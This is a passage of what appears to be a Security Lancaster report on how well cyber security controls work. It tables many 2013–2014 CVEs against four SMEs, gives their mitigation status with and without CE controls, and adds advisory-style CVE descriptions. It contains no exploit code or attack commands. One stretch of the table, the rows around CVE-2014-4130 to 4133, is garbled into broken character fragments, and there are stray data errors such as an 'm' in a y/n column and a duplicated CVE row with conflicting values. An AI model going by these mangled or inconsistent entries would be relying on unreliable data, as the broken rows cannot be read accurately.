CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated | Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated | Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated | Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (no JS)
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | m | Not Mitigated | Mitigated | Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated | Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated | Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated | Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated | Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated | Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated | Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated | Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated | Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated | Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated | Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated | Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated | Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall Anti DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated | Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated | Firewall Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall Anti-DoS, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated |  Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated | Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Managem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
| CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE |
|---|---|---|---|---|---|---|---|
| CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware |
| CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration |
| CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6369 | y | n | y | y |  | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management |
| CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management |
| CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-DOS, Firmware Updates |
| CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration |
CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50.488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.

CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

